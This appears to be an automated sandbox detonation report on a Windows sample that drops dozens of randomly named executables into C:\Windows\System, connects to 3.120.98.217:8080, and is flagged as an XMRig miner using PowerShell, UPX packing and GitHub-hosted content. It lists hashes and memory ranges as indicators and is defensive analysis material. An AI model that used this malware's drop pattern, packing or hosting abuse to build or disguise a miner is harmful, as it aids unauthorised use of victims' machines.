C:\Windows\System\NlETXFU.exe

C:\Windows\System\NlETXFU.exe

C:\Windows\System\cThZRuw.exe

C:\Windows\System\cThZRuw.exe

C:\Windows\System\VpArTvX.exe

C:\Windows\System\VpArTvX.exe

C:\Windows\System\UNjlGYD.exe

C:\Windows\System\UNjlGYD.exe

C:\Windows\System\NfyDGPD.exe

C:\Windows\System\NfyDGPD.exe

C:\Windows\System\pVYYkey.exe

C:\Windows\System\pVYYkey.exe

C:\Windows\System\CUKNyiH.exe

C:\Windows\System\CUKNyiH.exe

C:\Windows\System\zFLzmHS.exe

C:\Windows\System\zFLzmHS.exe

C:\Windows\System\JrvNNdb.exe

C:\Windows\System\JrvNNdb.exe

C:\Windows\System\WElsDOg.exe

C:\Windows\System\WElsDOg.exe

C:\Windows\System\OtaVKbA.exe

C:\Windows\System\OtaVKbA.exe

C:\Windows\System\AHNFJsZ.exe

C:\Windows\System\AHNFJsZ.exe

C:\Windows\System\RbXXnJy.exe

C:\Windows\System\RbXXnJy.exe

C:\Windows\System\BSUmgZw.exe

C:\Windows\System\BSUmgZw.exe

C:\Windows\System\XyozLKe.exe

C:\Windows\System\XyozLKe.exe

C:\Windows\System\ScJFnhw.exe

C:\Windows\System\ScJFnhw.exe

C:\Windows\System\vtLydIO.exe

C:\Windows\System\vtLydIO.exe

C:\Windows\System\mLpzAyj.exe

C:\Windows\System\mLpzAyj.exe

C:\Windows\System\NDNpWrx.exe

C:\Windows\System\NDNpWrx.exe

C:\Windows\System\DSrEmYn.exe

C:\Windows\System\DSrEmYn.exe

C:\Windows\System\hKnrYbX.exe

C:\Windows\System\hKnrYbX.exe

C:\Windows\System\SeGYAvZ.exe

C:\Windows\System\SeGYAvZ.exe

C:\Windows\System\tcXXrzS.exe

C:\Windows\System\tcXXrzS.exe

C:\Windows\System\dDfByAo.exe

C:\Windows\System\dDfByAo.exe

C:\Windows\System\wXHTaNe.exe

C:\Windows\System\wXHTaNe.exe

C:\Windows\System\KbtrXrL.exe

C:\Windows\System\KbtrXrL.exe

C:\Windows\System\TRMmUCy.exe

C:\Windows\System\TRMmUCy.exe

C:\Windows\System\UuEjSob.exe

C:\Windows\System\UuEjSob.exe

C:\Windows\System\yrmWQaM.exe

C:\Windows\System\yrmWQaM.exe

C:\Windows\System\izncUka.exe

C:\Windows\System\izncUka.exe

C:\Windows\System\UIhHYCG.exe

C:\Windows\System\UIhHYCG.exe

C:\Windows\System\xyWmOnO.exe

C:\Windows\System\xyWmOnO.exe

C:\Windows\System\jvIxkUo.exe

C:\Windows\System\jvIxkUo.exe

C:\Windows\System\xkzvWXA.exe

C:\Windows\System\xkzvWXA.exe

C:\Windows\System\PTyKBBQ.exe

C:\Windows\System\PTyKBBQ.exe

C:\Windows\System\kLGePKt.exe

C:\Windows\System\kLGePKt.exe

C:\Windows\System\GhKwLkE.exe

C:\Windows\System\GhKwLkE.exe

C:\Windows\System\BdUurEd.exe

C:\Windows\System\BdUurEd.exe

C:\Windows\System\gpgPqhm.exe

C:\Windows\System\gpgPqhm.exe

C:\Windows\System\QqcJDfW.exe

C:\Windows\System\QqcJDfW.exe

C:\Windows\System\qQGeFtA.exe

C:\Windows\System\qQGeFtA.exe

C:\Windows\System\nmgvCGi.exe

C:\Windows\System\nmgvCGi.exe

C:\Windows\System\rVHVSLj.exe

C:\Windows\System\rVHVSLj.exe

C:\Windows\System\qMlQRvi.exe

C:\Windows\System\qMlQRvi.exe

C:\Windows\System\ZLGpiwt.exe

C:\Windows\System\ZLGpiwt.exe

C:\Windows\System\PGiFTlZ.exe

C:\Windows\System\PGiFTlZ.exe

C:\Windows\System\uVSwYpC.exe

C:\Windows\System\uVSwYpC.exe

C:\Windows\System\WiFYROr.exe

C:\Windows\System\WiFYROr.exe

C:\Windows\System\QSdouVi.exe

C:\Windows\System\QSdouVi.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2912-0-0x000000013FC60000-0x0000000140056000-memory.dmp

memory/2912-1-0x00000000001F0000-0x0000000000200000-memory.dmp

C:\Windows\system\PaynJdn.exe

MD5 1bc33bed2907752dfc6c58897e6ddf32
SHA1 695c5051115788accc28181d35218ca8d02b28b9
SHA256 8cfca3a14475cc08471317f468d6a993aaf809f86acccadb024343bb22ec6574
SHA512 f92f9fdd96151251e5af59de108a17ffdc5f1d579a6033eb77783235811518e69ed007d499b149068309768a944022ee5d28c32f812c687934ee4f93d05ed506

memory/2912-8-0x000000013F2A0000-0x000000013F696000-memory.dmp

memory/1920-9-0x000000013F2A0000-0x000000013F696000-memory.dmp

C:\Windows\system\SdICGhJ.exe

MD5 895dac2e92574ebca29c5fd43f4b87f7
SHA1 1fd8428f30e656727ca604184fce2fda19437c03
SHA256 f56e1d7f01585acab5b1d3df771e7a7e9bb0fb599e68078ab18ffc2466b9a17e
SHA512 653a2e4ebfdc0e5b51631aaef77de10c7317c460d3da6c95af25b1847b773ce420b9ed080dbe7e48ad0a8e53b1888c131c2e80885eb0b41dc71cc6c5670234d4

C:\Windows\system\TWezKKv.exe

MD5 8f35bd064482f7221ac04f1fa9c36968
SHA1 bb258b1a6efe93138fd7eb3b81c9d620f949d6a4
SHA256 ca968753c48fb1a5378bc88fb83b48f4fe2e4ab985dd96348fd8e8e40c972c12
SHA512 6b781302879d1649f899d37a86578d091fc1093c885c8ba69be4449f229947da89572469cc29b4fc461f7c4bf28ea01658f1a182f564a783f767d0aa83feacd4

\Windows\system\yTMbmAM.exe

MD5 758326c520f81235bbb5c8060857fd8f
SHA1 11733a32b46cce570223bbca6b9a4f95ec19c6e5
SHA256 da3afa25b426d6c11ca4b80fafb131c368ac41a24d9883bfba16a0ea756a9a3c
SHA512 9bb0eed2fbe822a5eb5dd324cd0ef84dda2daecb14ac30c96e379345e54e5a6ae517cadbe9d21cbc79b48c820c11453c839f55eb6a32d1621683d736614edcca

\Windows\system\vhRvbkc.exe

MD5 f049808865f3c8737da66c1713bd81a1
SHA1 e59195639528bb5be49ce44633ca9d874f628988
SHA256 f97baee950e5ce9bdfc2b7517fb493b389d5fb93a36ec60eb08d51438f98d137
SHA512 c666e6126b52b2da575be44d0c3f9d0857b9c2b9bba7dd360d7daf847d2087a73efecb38227ea04eaaf13b0295543f4b92b965404738b3537ee0b4e6bb5fcacc

memory/2828-57-0x000000013F5C0000-0x000000013F9B6000-memory.dmp

memory/2912-66-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

\Windows\system\SqEHUon.exe

MD5 07ad26ea86c4f2207087423d63d7f29b
SHA1 a9d7a789798ff35dd1b099e87025498ee7f95be4
SHA256 2239c53ce36fa4ab27fbd4871d0ae2079053523b2a6a1573533379fa284011b0
SHA512 74a1bf44149224021ffcf1f964bcdb96bfda01d60743d2c6f26e10552d3671ad3bc0508c0c180c66862acd453c4e19d9ce5b36aba0938983b9a805cd64135a4e

memory/2488-67-0x000000013FFE0000-0x00000001403D6000-memory.dmp

memory/2912-71-0x00000000031D0000-0x00000000035C6000-memory.dmp

memory/820-95-0x000000013FEE0000-0x00000001402D6000-memory.dmp

C:\Windows\system\OGLDlvo.exe

MD5 23f554ca88db908f512f7df6da188221
SHA1 32f37716bf8e2d931c78895ac113b44e3800f361
SHA256 e3b7bc9b8be3dc39749934ed89efcd3f8a01e3a39058f24b9560fc34ecc3758d
SHA512 a76737ff5e8e9b396344a666fe0fd91be4528b4e2f52b2269c36cdd393271dc8008c6306ab88d2f077ef94e9e98d0cd477aed6db924ea3cae0f0fbd20e527a76

C:\Windows\system\sZTDrbb.exe

MD5 e4c13a2eceda8e913ff84f2a43a2e5e9
SHA1 1ca57dadae5d18fb023e71c11d33f13b90d55d7d
SHA256 3fc23546ab3db6bb7594a9adc5291db633d22e05b14b50dd9ab6b1f69f8caebd
SHA512 6c627a3c897280db293355dfd25ec65f86b343571998672943a478050f7ac8a8659a3325735f9b321e72884402424d6448cff1926b235d8d85432799c5568f24

C:\Windows\system\EHtKsrW.exe

MD5 4c9a50f36296b93c4bfd3e22f60a0064
SHA1 7d20ba07cb26617c1e6e33e081386110822defce
SHA256 59ef5243d37b111797f2a93889b7ac2dd07fd4dcb87e1e87f1db5b3f64fbb7f5
SHA512 9fe2220a9650bd5f2b1cdd8d3df72084b02ed3f8e66f7ae92221a7b48af3eee3b3d66746234e96c7b18e9a221cfff388548b4eb1b74849a28e826089cf1d3784

C:\Windows\system\jxWTuiY.exe

MD5 574b296b9c21d550fadb6fbaa5c0c8f9
SHA1 9f86ad126e49516607b3007ab9a69acdf69bc1dd
SHA256 6c010a94adb3507dd11e4573b3505256bda0893485c70403a3ee4292f53d7c59
SHA512 bfc7999d988f97ac10cfff2039c06315b96f0767a864f64891b9c34ab803a9390c663d91a136fc3f7cd22319529686b2765c8cdefe3df736af96a785a19686ef

C:\Windows\system\wXvWunI.exe

MD5 d76633927dbe9ea8954a619df48a43a0
SHA1 b8f42dfe1fc7aae1d18ec24c88422d419bf0d48b
SHA256 e720a99c3b4fa7b56ac8c32db4a1a0becb558ab96c785deebbeb2eb486ff5843
SHA512 1ba25721c2e3136bdf134d7d9cce34bced9a41b652a626b126e9af5a607e5bea2c08d4156aac06cedfc7cd8adeb50f5ee7a19caa41ed063aee869ab59a185363

memory/2912-1133-0x000000013FC60000-0x0000000140056000-memory.dmp

memory/2912-2255-0x00000000031D0000-0x00000000035C6000-memory.dmp

memory/2912-2441-0x00000000031D0000-0x00000000035C6000-memory.dmp

memory/1920-2493-0x000000013F2A0000-0x000000013F696000-memory.dmp

memory/2908-2495-0x000000013F6A0000-0x000000013FA96000-memory.dmp

memory/2828-2502-0x000000013F5C0000-0x000000013F9B6000-memory.dmp

memory/2480-2500-0x000000013FCB0000-0x00000001400A6000-memory.dmp

memory/2248-2497-0x000000013FC90000-0x0000000140086000-memory.dmp

memory/820-2560-0x000000013FEE0000-0x00000001402D6000-memory.dmp

memory/2528-2570-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

memory/2340-2581-0x000000013F170000-0x000000013F566000-memory.dmp

memory/1532-2579-0x000000013FAA0000-0x000000013FE96000-memory.dmp

memory/2456-2574-0x000000013FEA0000-0x0000000140296000-memory.dmp

memory/2488-2557-0x000000013FFE0000-0x00000001403D6000-memory.dmp

memory/2732-2533-0x000000013FD20000-0x0000000140116000-memory.dmp

memory/1944-1864-0x0000000001E50000-0x0000000001E58000-memory.dmp

memory/1944-1800-0x0000000002A20000-0x0000000002AA0000-memory.dmp

memory/1944-1453-0x000000001B280000-0x000000001B562000-memory.dmp

C:\Windows\system\FueHtBZ.exe

MD5 620768a78fb26bc6fe1bf9488f612772
SHA1 71607b66a1cfd1e08ad51c0af5fd737b7c3dbb63
SHA256 b295ca5ebfdfd8d1085c61ab86303f142c6d51c8a2639a0624676d61a4316b25
SHA512 a4f2ed5c6d3db2efb27f6eaf7b03b38cdded2381c9e1e3307a84e38ba977703a610008d6e354ffed41075015d168f25df6e43279be7860422411233c1dfefea3

C:\Windows\system\ZsYlaCb.exe

MD5 8b871b65222b59583239b7bc103f68ff
SHA1 4c438c5fdd6bd1988e8c8a20d6c8ff3b6aa05ce2
SHA256 e1fe4b277a5ec2e4f8b9dbd0300eab5c627faa520e836f2bc39de8072c516fe9
SHA512 07c978cb32970e2623650160b5ff947e1303adb0619b0c63e68ca3806df103ad8fe30bc930c4b340be6f917b4df6f7abbf5b8e7a2b7e998886ab21f30eaf2ed4

C:\Windows\system\DblhNjB.exe

MD5 f09ad27f9f34a220c1e73a860a9b8bdb
SHA1 a5d1b4e595e971c814497f35cd0910c349d3a04e
SHA256 ceed83f3ff4ada886ff31a73e43b7b53824891ca3d83fe93f675991223fc89e4
SHA512 bba4e1894c910b69b711f5c4ea908040214f9a68cf2e9aeaafe9a88cdb0a3f434676314088f63de6ce8fac8d7a58395484d219d686120875a5aa9169a196b958

C:\Windows\system\NjTtfFY.exe

MD5 726f007035e42a1a0e78095fa799ae50
SHA1 5b00f4dcf15a2c9fb65fc19e7f411ac02ed3c1fd
SHA256 6a758ab4eb1d6e8704e53ea8fbf1303b9936319e9e2f3e57620c183d2bf51d46
SHA512 88862d8a49e76849bd86c96a8d3eaa1efd61b0a9c4018238974174840e2c43a1137a09607aa429c28c84adab9522857c885cd73b48d770b327a757f1ddc38557

C:\Windows\system\LBxIMBF.exe

MD5 7a8a8f9ad543047c81fd8ede9d2d1b96
SHA1 d6e471e1c15fb7f067dd82e24cb87e73d709a8a3
SHA256 174d3f442e96694c8f695ab3f10ecf5c1b2ff788321f0c6dab397363fa3288af
SHA512 cbf5eb19d6a0179a7c41e314fece858a72b6ea4dbc92d346810bf07ce9d33942ddc733c3525e6dc1c314a0b109d475cdd9f0309ad29269119a63c764e1c369e6

C:\Windows\system\aGYMHNL.exe

MD5 f09ea559f718d71000e5198849fd558a
SHA1 ce5a2ee52ae9c7364de42f09bd3e75d9ccdaf35f
SHA256 e1582c4085626d565b6fbec524e05880ef349934d1b94631462f87a6c659082f
SHA512 65ec13b1ce91281a990d2cd7862d42044cd6201da288b2325d35a668efd5d5ad0562d7d624416b871643b341e999f8f7766f5a47e350a5bc6c0b1556c51a6a9a

C:\Windows\system\iUKmawF.exe

MD5 a17dd138302fe5e13877c82c2dec253d
SHA1 f5030e93ed448aafe324af85207f4cd87a896312
SHA256 160743d4901cfed1e5866d3f82f99bccaaecad8da4230321dd52f6b30f11da54
SHA512 b05ca9d547cdc994a1b1296526589824cafd825bc52acfb9873e9dfaab74f3ebfb4b5eb4518bb9fcac632fff388ec0f9e1d05c1881c460c85954219b8ba780ad

C:\Windows\system\ZUrHLnP.exe

MD5 527c6b822fca7924f333409167e5ade6
SHA1 05ffbf533a7d7e74d47d217784e463a58a45e977
SHA256 8440be60c4946588454bd1cae7fe23c2011a3eb74eeda413beee6f89c4e9c717
SHA512 b5e16f3ac77873669fd2f8a2297f34b24c95503b1d2fd52d736507fce5a3e074daf4977102c0a745bd9b3c6071b5b67845391a218e8f8e1f85dfe56b2ddfa2a2

C:\Windows\system\WwLPmpI.exe

MD5 f0a76ba9b7913318159ccc9b0d882876
SHA1 4b92c0f7aed502bac460d37089e98c4e03dd8fd0
SHA256 4d2e6756754b6cfd178a2f7ee31fcae84afd36eba101b3f5aae66e8963586c4d
SHA512 439ae71b2e6d30264f8eda0f323a2b5623741af1410d60d9b7eb7cc41650ca65159accd73066ec371327d56664718eab497fb2e9fed10ce4e6701f757db197f2

C:\Windows\system\WsNJIml.exe

MD5 098241aa1ceb7e18f9068478bb8b42b1
SHA1 c0bfc6d63d7bfbcc8a46102a5d012621177e94ba
SHA256 19aa12e2a93dea8224d251e2afe025af2573ba53b2049de337bbdbecf1c53e9f
SHA512 9b639ec7dbc2f851006e4ae535ac5396a4ba9f55c5222e0e368a62e16b30e87d0a7531737334e9de25299299a785bcd5517ce6442c8b1ebfad073f8211ccb779

C:\Windows\system\MdPNyVR.exe

MD5 b3f04e306c86713eaebc27cf23cc324e
SHA1 56de432cbdd204e54d339f220abf6dc8c86097a9
SHA256 2a06b7d7d28270622096257b71036553cdb9f8ddbd47ed62412bbaf3fcb1564c
SHA512 769a5c1800e711cd97d18477b210d0a29a209640e9596652ac85229e9c5f3dff65b3c599d44ce15f309c353c02125d8be39c1f3287963b7227245be2f1aebcd0

C:\Windows\system\xYvCgoF.exe

MD5 04e12781065e46e08736cd527ab6ebbd
SHA1 0c3de00770d3f3b9bb57e32b1c30c5a6fe5dcd42
SHA256 c5c9e876c2d09ea47b3822c30eb281a2a1b6b73d042e886b0ec6fc0d02adffe8
SHA512 094dbfd1b89b07bc0345ad824af5ff58307eeabb69c64ca57a802f097ed81de27fcdf791a256f806f324773063a3889d3e017581668e85e8721d31f56cb57aeb

C:\Windows\system\aKgPLFT.exe

MD5 f05c3c95ac3ae77cbfd9263617f82453
SHA1 af9fbe5f7a30d2e3a287f49e74b58feb6b8d3ceb
SHA256 d8b6efabf25e987db88879e4ea121b799f63e7ca4f31c3ad6e970106e2dbf600
SHA512 d32e93c9975f4434e518996e46d2a677718ec7060e189438a08db76e2b048108f359dc09cf759952c42a7fc7f6dd5c504c94a2ed5eefaf4f7a083ba902cb10c1

memory/2912-101-0x00000000031D0000-0x00000000035C6000-memory.dmp

C:\Windows\system\EqcNSLS.exe

MD5 8d726ed7fa1d5ea884a2ef6f0c2b6f95
SHA1 568750de1022e18965c3ad2328703a1e00eb8fcc
SHA256 1ff64066e0acbcc5f7ad206ae6e1fdf6cf818b3adbe323c996d1c66246baa6d8
SHA512 c8b72061b9d56ecc661fa7426864a9096227f86161db8d955aee40883409b65ef2470cc45ce7d545f32e0336512c09be491b2512c9d667ef147d54da6ae7566b

memory/1532-100-0x000000013FAA0000-0x000000013FE96000-memory.dmp

C:\Windows\system\juHPVoF.exe

MD5 31445c01bad199b9d853a50314c39878
SHA1 b75c383d38487ea1bde1f865d38167e9b7520925
SHA256 7ac3fad09245daf9f493924b2426ef616068ee218d5b64ca6c8b66fda47c8797
SHA512 d193283c306d684c83aa6c9ebcd46e537d70829953e5291a0fe10fe530efea3a93c2f51b41e06a458db5557f34f731adc6b06adcade0153ccb3ae35b563dbdfa

C:\Windows\system\GrfVFrC.exe

MD5 9fde8960d4a49816c2ee47d51ae56edc
SHA1 eaef89278ec81f7677d61c734f0a3c7dfb66b0bf
SHA256 45b21b851401949e21eb3779a82a1a7f1fb0014886e7c6edf9d55cb024da7131
SHA512 467d8ef48f72a27c42ff26fe15664f203bc3f137cc2965ad6fc4cc6428942e1d81e16c415c399079853bbce7d804e526d83cddddb7c3c93fdef4ce80ff91c0b3

memory/2912-84-0x00000000031D0000-0x00000000035C6000-memory.dmp

memory/2456-78-0x000000013FEA0000-0x0000000140296000-memory.dmp

memory/2912-77-0x00000000031D0000-0x00000000035C6000-memory.dmp

C:\Windows\system\OLRzWEJ.exe

MD5 591af02b4b6d79b50103480f106f175f
SHA1 a18bc979bb7c3ce8800de3479eee16e45a88a453
SHA256 c789bf8a6c9bb4edf15b6c0043240cd538394109e56ac37fb2dc2e970a5842d6
SHA512 760dcadf532caddf79cdfe792c9adca2f1aa4abe1b37d8db78247ef783902dae82a293778cad8ac4dfb49d2459fafecfc3cd2cef4317d945105bfc5d2c6b68cd

C:\Windows\system\QZKhCcc.exe

MD5 fd91866641eedbabd4693344d2ee2736
SHA1 6d0efd67032f0fefb590ac03a4887c3adca4fd6d
SHA256 3c459cdd923608293eb9f4d4b21ce87cf6948c228bb1ef87e68d3e1902355ed4
SHA512 630c0db3532aa30fe40163d73bc8acb8db4689538dca710561b9a978b87dc33acb09d37fc492ae99c326828c6361fa2a5bc02493e316852e152f4e57e1619db6

memory/2340-70-0x000000013F170000-0x000000013F566000-memory.dmp

memory/2912-69-0x00000000031D0000-0x00000000035C6000-memory.dmp

memory/2528-68-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

memory/2732-65-0x000000013FD20000-0x0000000140116000-memory.dmp

C:\Windows\system\AegArYW.exe

MD5 1adae75d30b3d92a821e85c5769189e1
SHA1 bed62cdf8c8b1292089f2030f2040d66cb15de91
SHA256 384ae1c2eab247951cf6b350e57fd0a232869e1a1981d9bc61c848edcee75812
SHA512 21b014eb2a661cb802354716032df1352b11383f1805b3086f8a305ffbe19b40e189024f73a8b7fe4b9d5900a6eedddacd244b366dde678460916da6062a03b1

memory/2912-43-0x000000013F170000-0x000000013F566000-memory.dmp

memory/2480-41-0x000000013FCB0000-0x00000001400A6000-memory.dmp

memory/1944-30-0x0000000002A20000-0x0000000002AA0000-memory.dmp

memory/2248-29-0x000000013FC90000-0x0000000140086000-memory.dmp

memory/2912-50-0x00000000031D0000-0x00000000035C6000-memory.dmp

memory/1944-49-0x000007FEF504E000-0x000007FEF504F000-memory.dmp

C:\Windows\system\NERXtYf.exe

MD5 a41ccee200454f1f11ebe7a6aa27933a
SHA1 e9f956f24a05e9351ee5739b425ec107e3a55d00
SHA256 16e408add3a8dde3b8a528e50b709a4b53d4050dab23e9c1abd92b53306e3884
SHA512 16f0f0bd90f7457886cb8a5d960b779e31daa0d0591b47ea3bf14e9de306a7d37ed7988910cbd8f26fd89b3f403bc164e91fe0d761b4fe2da4a253292f2b5012

memory/2912-47-0x0000000002D50000-0x0000000003146000-memory.dmp

memory/2912-35-0x000000013F5C0000-0x000000013F9B6000-memory.dmp

C:\Windows\system\HVBtvAf.exe

MD5 5553bb2b9b5eab1e122a52f03b5579d5
SHA1 2ad9b0c5372a26b69c12860cf19b3b17cda7daed
SHA256 073280dc5ffb6c30dd0fe47ea7fb682ed0e513e7448dab60f516e102d11137b5
SHA512 963e7b01356d7f1e7d35badc8d094fdc26c66901a39cee2801ad263aa83e546c0855fdff44aeaae593f91a96e46f2540338eec6461f6d76026f76007a6948dd8

memory/2908-25-0x000000013F6A0000-0x000000013FA96000-memory.dmp

memory/2912-15-0x000000013F6A0000-0x000000013FA96000-memory.dmp

memory/2912-4539-0x00000000031D0000-0x00000000035C6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 08:37

Reported

2024-06-13 08:39

Platform

win10v2004-20240611-en

Max time kernel

147s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\fIlbYNN.exe N/A
N/A N/A C:\Windows\System\KNYYioD.exe N/A
N/A N/A C:\Windows\System\DKeohMX.exe N/A
N/A N/A C:\Windows\System\ejAqbSG.exe N/A
N/A N/A C:\Windows\System\xebRqFN.exe N/A
N/A N/A C:\Windows\System\qHgayBI.exe N/A
N/A N/A C:\Windows\System\ZRLQtiG.exe N/A
N/A N/A C:\Windows\System\ukGYJRY.exe N/A
N/A N/A C:\Windows\System\tKpaLNq.exe N/A
N/A N/A C:\Windows\System\ZTsJcPO.exe N/A
N/A N/A C:\Windows\System\NjtnXyN.exe N/A
N/A N/A C:\Windows\System\nCueyzE.exe N/A
N/A N/A C:\Windows\System\GbKxCZl.exe N/A
N/A N/A C:\Windows\System\xVEBDBh.exe N/A
N/A N/A C:\Windows\System\TrfYjmT.exe N/A
N/A N/A C:\Windows\System\MWtlxai.exe N/A
N/A N/A C:\Windows\System\cScLAcj.exe N/A
N/A N/A C:\Windows\System\DmXYuHT.exe N/A
N/A N/A C:\Windows\System\IEfnfGc.exe N/A
N/A N/A C:\Windows\System\eJqpqPp.exe N/A
N/A N/A C:\Windows\System\jSzHzpL.exe N/A
N/A N/A C:\Windows\System\ZuuCnwg.exe N/A
N/A N/A C:\Windows\System\fmipLjX.exe N/A
N/A N/A C:\Windows\System\Xkxrwyn.exe N/A
N/A N/A C:\Windows\System\XeCghno.exe N/A
N/A N/A C:\Windows\System\FZoJRmx.exe N/A
N/A N/A C:\Windows\System\CHZqqLH.exe N/A
N/A N/A C:\Windows\System\HdcwxPK.exe N/A
N/A N/A C:\Windows\System\PohxAXF.exe N/A
N/A N/A C:\Windows\System\GlCpQHN.exe N/A
N/A N/A C:\Windows\System\bPlYssB.exe N/A
N/A N/A C:\Windows\System\ZYbpkOX.exe N/A
N/A N/A C:\Windows\System\gkPJXkj.exe N/A
N/A N/A C:\Windows\System\xWcFORj.exe N/A
N/A N/A C:\Windows\System\lLFPZBq.exe N/A
N/A N/A C:\Windows\System\clDEuyI.exe N/A
N/A N/A C:\Windows\System\hPPhOeu.exe N/A
N/A N/A C:\Windows\System\CunewMt.exe N/A
N/A N/A C:\Windows\System\FWOnZKp.exe N/A
N/A N/A C:\Windows\System\HunkdpF.exe N/A
N/A N/A C:\Windows\System\ryDbGZf.exe N/A
N/A N/A C:\Windows\System\RirffBw.exe N/A
N/A N/A C:\Windows\System\JfrsSyE.exe N/A
N/A N/A C:\Windows\System\LiGfXKF.exe N/A
N/A N/A C:\Windows\System\yIDDIhB.exe N/A
N/A N/A C:\Windows\System\lWtiRel.exe N/A
N/A N/A C:\Windows\System\aMudOFA.exe N/A
N/A N/A C:\Windows\System\UIhjBNl.exe N/A
N/A N/A C:\Windows\System\bObWExB.exe N/A
N/A N/A C:\Windows\System\YagVEZh.exe N/A
N/A N/A C:\Windows\System\SxlFphS.exe N/A
N/A N/A C:\Windows\System\fMaMkDV.exe N/A
N/A N/A C:\Windows\System\fjPtlBi.exe N/A
N/A N/A C:\Windows\System\zZxjCBu.exe N/A
N/A N/A C:\Windows\System\aGBgxUE.exe N/A
N/A N/A C:\Windows\System\qQrkxfO.exe N/A
N/A N/A C:\Windows\System\LSRbJWJ.exe N/A
N/A N/A C:\Windows\System\CKnRotH.exe N/A
N/A N/A C:\Windows\System\DerJYsU.exe N/A
N/A N/A C:\Windows\System\wqrCysS.exe N/A
N/A N/A C:\Windows\System\ULDgfoU.exe N/A
N/A N/A C:\Windows\System\KQrVQtf.exe N/A
N/A N/A C:\Windows\System\lMYZtyf.exe N/A
N/A N/A C:\Windows\System\aObdxsX.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\vjDjXbE.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\VMtvDWb.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\BXcOqJB.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\jWeWeXI.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\szstauc.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
